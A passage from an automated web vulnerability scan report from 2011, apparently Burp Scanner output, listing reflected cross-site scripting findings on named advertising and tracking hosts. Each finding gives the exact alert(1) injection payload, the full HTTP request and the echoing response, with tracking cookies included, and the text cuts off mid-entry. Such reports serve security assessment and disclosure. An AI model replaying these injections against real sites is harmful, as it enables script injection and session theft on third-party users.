Cookie: cmp=1_1303743268_10164:0_10638:0_10640:0_10641:0_1437:0_1660:563596; uid=1_1303743268_1303179323923:6792170478871670; kwd=1_1303743268_11317:0_11717:0_11718:0_11719:0; sit=1_1303743268_719:827:0_2451:51696:46596_3236:209659:209541_782:563945:563596; cre=1_1303743268; bpd=1_1303743268; apd=1_1303743268; scg=1_1303743268; ppd=1_1303743268; afl=1_1303743268

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 20:03:07 GMT
Server: Apache/2.2.3 (CentOS)
Set-Cookie: cmp=1_1303848187_10164:104919_10638:104919_10640:104919_10641:104919_1437:104919_1660:668515; Domain=.fetchback.com; Expires=Sun, 24-Apr-2016 20:03:07 GMT; Path=/
Set-Cookie: uid=1_1303848187_1303179323923:6792170478871670; Domain=.fetchback.com; Expires=Sun, 24-Apr-2016 20:03:07 GMT; Path=/
Set-Cookie: kwd=1_1303848187_11317:104919_11717:104919_11718:104919_11719:104919; Domain=.fetchback.com; Expires=Sun, 24-Apr-2016 20:03:07 GMT; Path=/
Set-Cookie: sit=1_1303848187_719:105746:104919_2451:156615:151515_3236:314578:314460_782:668864:668515; Domain=.fetchback.com; Expires=Sun, 24-Apr-2016 20:03:07 GMT; Path=/
Set-Cookie: cre=1_1303848187; Domain=.fetchback.com; Expires=Sun, 24-Apr-2016 20:03:07 GMT; Path=/
Set-Cookie: bpd=1_1303848187; Domain=.fetchback.com; Expires=Sun, 24-Apr-2016 20:03:07 GMT; Path=/
Set-Cookie: apd=1_1303848187; Domain=.fetchback.com; Expires=Sun, 24-Apr-2016 20:03:07 GMT; Path=/
Set-Cookie: scg=1_1303848187; Domain=.fetchback.com; Expires=Sun, 24-Apr-2016 20:03:07 GMT; Path=/
Set-Cookie: ppd=1_1303848187; Domain=.fetchback.com; Expires=Sun, 24-Apr-2016 20:03:07 GMT; Path=/
Set-Cookie: afl=1_1303848187; Domain=.fetchback.com; Expires=Sun, 24-Apr-2016 20:03:07 GMT; Path=/
Cache-Control: max-age=0, no-store, must-revalidate, no-cache
Expires: Tue, 26 Apr 2011 20:03:07 GMT
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 91

<!-- campaign : 'landing78020<x style=x:expression(alert(1))>7f33d133aba' *not* found -->

5.162. http://realestate.msn.us.intellitxt.com/al.asp [jscallback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://realestate.msn.us.intellitxt.com
Path:   /al.asp

Issue detail

The value of the jscallback request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload bf287%3balert(1)//f83feec8c47 was submitted in the jscallback parameter. This input was echoed as bf287;alert(1)//f83feec8c47 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /al.asp?ts=20110426184640&cc=us&hk=1&ipid=20029&mh=bd3142edfc2bce02d9fc379eee21c2c1&pvm=f67439ad677e2c9299a82dfc253295cd&pvu=014CCF305AC145B7BA348BA3CAACA02D&rcc=us&so=0&prf=ll%3A19249%7Cintl%3A41679%7Cpreprochrome%3A308%7Cgetconchrome%3A237%7Cadvint%3A42259%7Cadvl%3A42259%7Ctl%3A42259&jscallback=$iTXT.js.callback1bf287%3balert(1)//f83feec8c47 HTTP/1.1
Host: realestate.msn.us.intellitxt.com
Proxy-Connection: keep-alive
Referer: http://realestate.msn.com/article.aspx?cp-documentid=28280145
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VM_PIX=AQAAAAQAAArJAQAAAAEAAAEvki9eGgAACucBAAAAAQAAAS+SL14aAAAK1QEAAAABAAABL5IvXhoAAArHAQAAAAEAAAEvki9eGgAAAAD9SQn+; VM_USR=AArNPECOHUvQr+aEbt9FOpIAADrpAAA7LgIAAAEvkyGmjQA-

Response

HTTP/1.1 200 OK
Cache-Control: private
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
P3P: CP="NON DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM CNT STA PRE LOC"
Set-Cookie: VM_USR=AArNPECOHUvQr+aEbt9FOpIAADrpAAA7LgIAAAEvkyGmjQA-; Domain=.intellitxt.com; Expires=Sat, 25-Jun-2011 18:47:18 GMT; Path=/
Content-Type: text/javascript
Content-Length: 65
Date: Tue, 26 Apr 2011 18:47:18 GMT
Age: 0
Connection: keep-alive

try{$iTXT.js.callback1bf287;alert(1)//f83feec8c47();}catch(e){}

5.163. http://realestate.msn.us.intellitxt.com/intellitxt/front.asp [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://realestate.msn.us.intellitxt.com
Path:   /intellitxt/front.asp

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f7366'-alert(1)-'b7e52cebacd was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /intellitxt/front.asp?ipid=20029&f7366'-alert(1)-'b7e52cebacd=1 HTTP/1.1
Host: realestate.msn.us.intellitxt.com
Proxy-Connection: keep-alive
Referer: http://realestate.msn.com/article.aspx?cp-documentid=28280145
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VM_PIX=AQAAAAQAAArJAQAAAAEAAAEvki9eGgAACucBAAAAAQAAAS+SL14aAAAK1QEAAAABAAABL5IvXhoAAArHAQAAAAEAAAEvki9eGgAAAAD9SQn+; VM_USR=AArNPECOHUvQr+aEbt9FOpIAADrpAAA7LgEAAAEvki8pzwA-

Response

HTTP/1.1 200 OK
P3P: CP="NON DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM CNT STA PRE LOC"
Set-Cookie: VM_USR=AArNPECOHUvQr+aEbt9FOpIAADrpAAA7LgIAAAEvkyHm3AA-; Domain=.intellitxt.com; Expires=Sat, 25-Jun-2011 18:46:03 GMT; Path=/
Cache-Control: private
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
P3P: CP="NON DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM CNT STA PRE LOC"
Access-Control-Allow-Origin: *
Set-Cookie: VM_USR=AArNPECOHUvQr+aEbt9FOpIAADrpAAA7LgIAAAEvkyHm3QA-; Domain=.intellitxt.com; Expires=Sat, 25-Jun-2011 18:46:03 GMT; Path=/
Content-Type: application/x-javascript
Vary: Accept-Encoding
Date: Tue, 26 Apr 2011 18:46:03 GMT
Age: 0
Connection: keep-alive
Content-Length: 11116

document.itxtDisabled=1;
document.itxtDebugOn=false;
if(document.itxtDisabled){
document.itxtInProg=1;
if ('undefined'== typeof $iTXT){$iTXT={};};if (!$iTXT.cnst){$iTXT.cnst={};} if (!$iTXT.debug){$iT
...[SNIP]...
tp://b.scorecardresearch.com/b?c1=8&c2=6000002&c3=20000&c4=&c5=&c6=&c15=&cv=1.3&cj=1&rn=20110426184603";})();$iTXT.js.serverUrl='http://realestate.msn.us.intellitxt.com';$iTXT.js.pageQuery='ipid=20029&f7366'-alert(1)-'b7e52cebacd=1';$iTXT.js.umat=true;$iTXT.js.startTime=(new Date()).getTime();if (document.itxtIsReady) {document.itxtLoadLibraries();};
}

5.164. http://realestate.msn.us.intellitxt.com/v4/init [jscallback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://realestate.msn.us.intellitxt.com
Path:   /v4/init

Issue detail

The value of the jscallback request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 9c51d%3balert(1)//8c141cbb073 was submitted in the jscallback parameter. This input was echoed as 9c51d;alert(1)//8c141cbb073 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /v4/init?ts=1303843577474&pagecl=37902&fv=10&muid=&refurl=http%3A%2F%2Frealestate.msn.com%2Farticle.aspx%3Fcp-documentid%3D28280145&ipid=20029&jscallback=$iTXT.js.callback09c51d%3balert(1)//8c141cbb073 HTTP/1.1
Host: realestate.msn.us.intellitxt.com
Proxy-Connection: keep-alive
Referer: http://realestate.msn.com/article.aspx?cp-documentid=28280145
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VM_PIX=AQAAAAQAAArJAQAAAAEAAAEvki9eGgAACucBAAAAAQAAAS+SL14aAAAK1QEAAAABAAABL5IvXhoAAArHAQAAAAEAAAEvki9eGgAAAAD9SQn+; VM_USR=AArNPECOHUvQr+aEbt9FOpIAADrpAAA7LgIAAAEvkyGmjQA-

Response

HTTP/1.1 200 OK
Cache-Control: private
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
P3P: CP="NON DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM CNT STA PRE LOC"
Access-Control-Allow-Origin: *
Content-Type: application/x-javascript
Vary: Accept-Encoding
Date: Tue, 26 Apr 2011 18:47:45 GMT
Age: 0
Connection: keep-alive
Content-Length: 7166

var undefined;if(null==$iTXT.glob.dbParams||undefined==$iTXT.glob.dbParams){$iTXT.glob.dbParams=new $iTXT.data.Param(undefined,undefined,undefined,'DATABASE');}$iTXT.glob.dbParams.set({"searchengine.h
...[SNIP]...
arams.set('minimagew',180);$iTXT.data.Context.params.set('minimageh',200);$iTXT.data.Context.params.set('intattrs','alt,title,href,src,name');$iTXT.data.Dom.detectSearchEngines();try{$iTXT.js.callback09c51d;alert(1)//8c141cbb073({"requiresContextualization":0,"requiresAdverts":1});}catch(e){}

5.165. http://realestate.msn.us.intellitxt.com/v4/init [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://realestate.msn.us.intellitxt.com
Path:   /v4/init

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a4bd9"-alert(1)-"7a83dccfee2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /v4/init?ts=1303843577474&pagecl=37902&fv=10&muid=&refurl=http%3A%2F%2Frealestate.msn.com%2Farticle.aspx%3Fcp-documentid%3D28280145&ipid=20029&jscallback=$iTXT.js.callback0&a4bd9"-alert(1)-"7a83dccfee2=1 HTTP/1.1
Host: realestate.msn.us.intellitxt.com
Proxy-Connection: keep-alive
Referer: http://realestate.msn.com/article.aspx?cp-documentid=28280145
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VM_PIX=AQAAAAQAAArJAQAAAAEAAAEvki9eGgAACucBAAAAAQAAAS+SL14aAAAK1QEAAAABAAABL5IvXhoAAArHAQAAAAEAAAEvki9eGgAAAAD9SQn+; VM_USR=AArNPECOHUvQr+aEbt9FOpIAADrpAAA7LgIAAAEvkyGmjQA-

Response

HTTP/1.1 200 OK
Cache-Control: private
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
P3P: CP="NON DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM CNT STA PRE LOC"
Access-Control-Allow-Origin: *
Content-Type: application/x-javascript
Vary: Accept-Encoding
Date: Tue, 26 Apr 2011 18:47:55 GMT
Age: 0
Connection: keep-alive
Content-Length: 7147

var undefined;if(null==$iTXT.glob.dbParams||undefined==$iTXT.glob.dbParams){$iTXT.glob.dbParams=new $iTXT.data.Param(undefined,undefined,undefined,'DATABASE');}$iTXT.glob.dbParams.set({"searchengine.h
...[SNIP]...
illa/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16","REGIONNAME":"Texas","muid":"","city":"Dallas","jscallback":"$iTXT.js.callback0","a4bd9"-alert(1)-"7a83dccfee2":"1","reg":"tx","refurl":"http://realestate.msn.com/article.aspx?cp-documentid\u003d28280145","rcc":"us","cc":"us"},null,60);var undefined;if(null==$iTXT.glob.params||undefined==$iTXT.glob.params){$iT
...[SNIP]...

5.166. http://recs.richrelevance.com/rrserver/p13n_generated.js [ctp parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://recs.richrelevance.com
Path:   /rrserver/p13n_generated.js

Issue detail

The value of the ctp request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d6b87'%3balert(1)//32ed94e5709 was submitted in the ctp parameter. This input was echoed as d6b87';alert(1)//32ed94e5709 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /rrserver/p13n_generated.js?a=756bd9ec9a083c52&ts=1303848188756&pt=%7Ccategory_page.bottom&u=%7B71c28bcc-895f-4239-9850-58ed6aba178d%7D&s=bijb1vookoje2tnvwh5oouwn&ctp=%7C0%3Apromcode%253D600582C43552%7C1%3Apromtype%253Dinternald6b87'%3balert(1)//32ed94e5709&l=1 HTTP/1.1
Host: recs.richrelevance.com
Proxy-Connection: keep-alive
Referer: http://west.thomson.com/default.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx/0.8.44
Date: Tue, 26 Apr 2011 20:03:40 GMT
Content-Type: application/x-javascript;charset=UTF-8
Connection: keep-alive
P3p: policyref="http://recs.richrelevance.com/w3c/p3p.xml", CP="NOI DSP COR NID CUR OUR NOR"
Set-Cookie: uc=525826ce-e29a-4f38-4315-024be4d0c771; Expires=Sun, 14-May-2079 23:17:47 GMT; Path=/
Vary: Accept-Encoding
Content-Length: 11848

function rrAttrib(linkurl){ var rrcart_img = new Image(); rrcart_img.src= linkurl;}var rr_recs={placements:[{used:false,placementType:'category_page.bottom',html:'<div class="r3_recommendations"><div
...[SNIP]...
<a href="http://west.thomson.com/store/AddItem.aspx?Product_id=162495&MaterialNumber=22061301&Product_type=1&promcode=600582C43552&promtype=internald6b87';alert(1)//32ed94e5709">
...[SNIP]...

5.167. http://servedby.flashtalking.com/imp/3/14752 [94537;201;js;MSN;ADVMSNMSNMoneyInvestingHomepageRMBanner300x250CPM/?click parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://servedby.flashtalking.com
Path:   /imp/3/14752

Issue detail

The value of the 94537;201;js;MSN;ADVMSNMSNMoneyInvestingHomepageRMBanner300x250CPM/?click request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 786bc"-alert(1)-"2db9af1c3c0 was submitted in the 94537;201;js;MSN;ADVMSNMSNMoneyInvestingHomepageRMBanner300x250CPM/?click parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /imp/3/14752;94537;201;js;MSN;ADVMSNMSNMoneyInvestingHomepageRMBanner300x250CPM/?click=786bc"-alert(1)-"2db9af1c3c0&ftx=&fty=&ftadz=&ftscw=&cachebuster=602976.6264837235 HTTP/1.1
Host: servedby.flashtalking.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: flashtalkingad1="GUID=1210EC55BB9841"

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 18:40:40 GMT
Server: Jetty(6.1.22)
Content-Length: 464
Cache-Control: no-cache, no-store
content-type: text/javascript
pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Via: 1.1 mdw061003 (MII-APC/1.6)


var ftGUID_94537="1210EC55BB9841";
var ftConfID_94537="0";
var ftParams_94537="click=786bc"-alert(1)-"2db9af1c3c0&ftx=&fty=&ftadz=&ftscw=&cachebuster=602976.6264837235";
var ftKeyword_94537="";
var ftSegment_94537="";
var ftSegmentList_94537=[];
var ftRuleMatch_94537="0";

document.write('<scr'+'ipt src="htt
...[SNIP]...

5.168. http://servedby.flashtalking.com/imp/3/14752 [cachebuster parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://servedby.flashtalking.com
Path:   /imp/3/14752

Issue detail

The value of the cachebuster request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3fd9e"-alert(1)-"1376e3d3251 was submitted in the cachebuster parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /imp/3/14752;94537;201;js;MSN;ADVMSNMSNMoneyInvestingHomepageRMBanner300x250CPM/?click=&ftx=&fty=&ftadz=&ftscw=&cachebuster=602976.62648372353fd9e"-alert(1)-"1376e3d3251 HTTP/1.1
Host: servedby.flashtalking.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: flashtalkingad1="GUID=1210EC55BB9841"

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 18:41:40 GMT
Server: Jetty(6.1.22)
Content-Length: 464
Cache-Control: no-cache, no-store
content-type: text/javascript
pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Via: 1.1 mdw061008 (MII-APC/1.6)


var ftGUID_94537="1210EC55BB9841";
var ftConfID_94537="0";
var ftParams_94537="click=&ftx=&fty=&ftadz=&ftscw=&cachebuster=602976.62648372353fd9e"-alert(1)-"1376e3d3251";
var ftKeyword_94537="";
var ftSegment_94537="";
var ftSegmentList_94537=[];
var ftRuleMatch_94537="0";

document.write('<scr'+'ipt src="http://cdn.flashtalking.com/tagsv3/94537/186988/js/j-9453
...[SNIP]...

5.169. http://servedby.flashtalking.com/imp/3/14752 [ftadz parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://servedby.flashtalking.com
Path:   /imp/3/14752

Issue detail

The value of the ftadz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 71dab"-alert(1)-"4addb22c6fd was submitted in the ftadz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /imp/3/14752;94537;201;js;MSN;ADVMSNMSNMoneyInvestingHomepageRMBanner300x250CPM/?click=&ftx=&fty=&ftadz=71dab"-alert(1)-"4addb22c6fd&ftscw=&cachebuster=602976.6264837235 HTTP/1.1
Host: servedby.flashtalking.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: flashtalkingad1="GUID=1210EC55BB9841"

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 18:41:19 GMT
Server: Jetty(6.1.22)
Content-Length: 464
Cache-Control: no-cache, no-store
content-type: text/javascript
pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Via: 1.1 mdw061008 (MII-APC/1.6)


var ftGUID_94537="1210EC55BB9841";
var ftConfID_94537="0";
var ftParams_94537="click=&ftx=&fty=&ftadz=71dab"-alert(1)-"4addb22c6fd&ftscw=&cachebuster=602976.6264837235";
var ftKeyword_94537="";
var ftSegment_94537="";
var ftSegmentList_94537=[];
var ftRuleMatch_94537="0";

document.write('<scr'+'ipt src="http://cdn.flashtalk
...[SNIP]...

5.170. http://servedby.flashtalking.com/imp/3/14752 [ftscw parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://servedby.flashtalking.com
Path:   /imp/3/14752

Issue detail

The value of the ftscw request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload af48e"-alert(1)-"d29e837d092 was submitted in the ftscw parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /imp/3/14752;94537;201;js;MSN;ADVMSNMSNMoneyInvestingHomepageRMBanner300x250CPM/?click=&ftx=&fty=&ftadz=&ftscw=af48e"-alert(1)-"d29e837d092&cachebuster=602976.6264837235 HTTP/1.1
Host: servedby.flashtalking.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: flashtalkingad1="GUID=1210EC55BB9841"

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 18:41:30 GMT
Server: Jetty(6.1.22)
Content-Length: 464
Cache-Control: no-cache, no-store
content-type: text/javascript
pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Via: 1.1 mdw061005 (MII-APC/1.6)


var ftGUID_94537="1210EC55BB9841";
var ftConfID_94537="0";
var ftParams_94537="click=&ftx=&fty=&ftadz=&ftscw=af48e"-alert(1)-"d29e837d092&cachebuster=602976.6264837235";
var ftKeyword_94537="";
var ftSegment_94537="";
var ftSegmentList_94537=[];
var ftRuleMatch_94537="0";

document.write('<scr'+'ipt src="http://cdn.flashtalking.com
...[SNIP]...

5.171. http://servedby.flashtalking.com/imp/3/14752 [ftx parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://servedby.flashtalking.com
Path:   /imp/3/14752

Issue detail

The value of the ftx request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5368a"-alert(1)-"128e10b5eda was submitted in the ftx parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /imp/3/14752;94537;201;js;MSN;ADVMSNMSNMoneyInvestingHomepageRMBanner300x250CPM/?click=&ftx=5368a"-alert(1)-"128e10b5eda&fty=&ftadz=&ftscw=&cachebuster=602976.6264837235 HTTP/1.1
Host: servedby.flashtalking.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: flashtalkingad1="GUID=1210EC55BB9841"

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 18:40:51 GMT
Server: Jetty(6.1.22)
Cache-Control: no-cache, no-store
Content-Length: 464
content-type: text/javascript
pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Via: 1.1 mdw061006 (MII-APC/1.6)


var ftGUID_94537="1210EC55BB9841";
var ftConfID_94537="0";
var ftParams_94537="click=&ftx=5368a"-alert(1)-"128e10b5eda&fty=&ftadz=&ftscw=&cachebuster=602976.6264837235";
var ftKeyword_94537="";
var ftSegment_94537="";
var ftSegmentList_94537=[];
var ftRuleMatch_94537="0";

document.write('<scr'+'ipt src="http://c
...[SNIP]...

5.172. http://servedby.flashtalking.com/imp/3/14752 [fty parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://servedby.flashtalking.com
Path:   /imp/3/14752

Issue detail

The value of the fty request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 84b00"-alert(1)-"cac21056698 was submitted in the fty parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /imp/3/14752;94537;201;js;MSN;ADVMSNMSNMoneyInvestingHomepageRMBanner300x250CPM/?click=&ftx=&fty=84b00"-alert(1)-"cac21056698&ftadz=&ftscw=&cachebuster=602976.6264837235 HTTP/1.1
Host: servedby.flashtalking.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: flashtalkingad1="GUID=1210EC55BB9841"

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 18:41:07 GMT
Server: Jetty(6.1.22)
Content-Length: 464
Cache-Control: no-cache, no-store
content-type: text/javascript
pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Via: 1.1 mdw061001 (MII-APC/1.6)


var ftGUID_94537="1210EC55BB9841";
var ftConfID_94537="0";
var ftParams_94537="click=&ftx=&fty=84b00"-alert(1)-"cac21056698&ftadz=&ftscw=&cachebuster=602976.6264837235";
var ftKeyword_94537="";
var ftSegment_94537="";
var ftSegmentList_94537=[];
var ftRuleMatch_94537="0";

document.write('<scr'+'ipt src="http://cdn.fl
...[SNIP]...

5.173. http://servedby.flashtalking.com/imp/3/14752 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://servedby.flashtalking.com
Path:   /imp/3/14752

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload be3a7"-alert(1)-"c5145c4eafe was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /imp/3/14752;94537;201;js;MSN;ADVMSNMSNMoneyInvestingHomepageRMBanner300x250CPM/?click=&ftx=&fty=&ftadz=&ftscw=&cachebuster=602976.6264837235&be3a7"-alert(1)-"c5145c4eafe=1 HTTP/1.1
Host: servedby.flashtalking.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: flashtalkingad1="GUID=1210EC55BB9841"

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 18:41:45 GMT
Server: Jetty(6.1.22)
P3p: policyref="/w3c/p3p.xml", CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/javascript
Cache-Control: no-cache, no-store
pragma: no-cache
Content-Length: 467
Via: 1.1 mdw061008 (MII-APC/1.6)


var ftGUID_94537="1210EC55BB9841";
var ftConfID_94537="0";
var ftParams_94537="click=&ftx=&fty=&ftadz=&ftscw=&cachebuster=602976.6264837235&be3a7"-alert(1)-"c5145c4eafe=1";
var ftKeyword_94537="";
var ftSegment_94537="";
var ftSegmentList_94537=[];
var ftRuleMatch_94537="0";

document.write('<scr'+'ipt src="http://cdn.flashtalking.com/tagsv3/94537/163477/js/j-94
...[SNIP]...

5.174. http://wd.sharethis.com/api/getApi.php [cb parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://wd.sharethis.com
Path:   /api/getApi.php

Issue detail

